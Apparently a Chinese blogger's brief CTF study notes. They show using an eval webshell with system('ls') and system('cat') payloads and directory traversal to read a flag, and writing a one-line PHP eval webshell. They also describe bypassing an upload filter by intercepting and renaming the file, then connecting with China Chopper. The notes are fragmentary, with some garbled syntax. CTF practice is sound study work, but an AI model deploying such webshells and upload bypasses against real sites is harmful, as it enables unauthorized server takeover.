补充

xiaoliman-byf / 2024-02-21 / 原文

1、题目:描述:http://115.239.217.94:16695/ 考察选手对于eval木马、ls、cat命令的运用

解法:输入http://115.239.217.94:16695,出现@eval($_GET['xszx,然后http://115.239.217.94:16695/?xszx=system('ls'); ,然后输入http://115.239.217.94:16695/?xszx=system('ls …/…/…/…/…/…/…/…/…/…/…/…/'); 找到flag,之后输入http://115.239.217.94:16695/?xszx=system('cat …/…/…/…/…/…/…/…/…/…/…/…/flag'); 

ls找东西

cat拿东西

 …/回溯上一级目录

   /   下一级目录

?前面是文件,作用传参

2、补充:看ip是http://115.239.217.94:16695/?xszx=system('if'); 

 图片:先下载下来,

扫端口:目录端口后台主机发现,router扫描端口,ip

Moba…,new  sen,远程主机填域名,用户名root,比赛填真实端口(端口填的比真实端口多1,eg.真实是18896填18897),路径var/www/html,所有文件选定右键下载,D盾,所有文件拖到里面,删除

http://115.239.217.94:7991/main

php标签外是文件

3、文件上传:

先随便上传一个php文件,之后将上传的文件底下的图片拖到浏览器得到地址,中国菜刀,右键添加,SHELL木马地址,密码是GET或POST框内的东西,然后双击出现的东西,新建文档并命名后缀为php,在文档中编辑木马eg.<?php @eval[$_POST[cmd]);?>   ,然后转为jpg文件上传,在上传同时抓包,将抓到的东西改为php,之后Forward。

补充:(传输前是前端校验,传输后是后端校验,抓包工具抓包时绕过了前端校验。)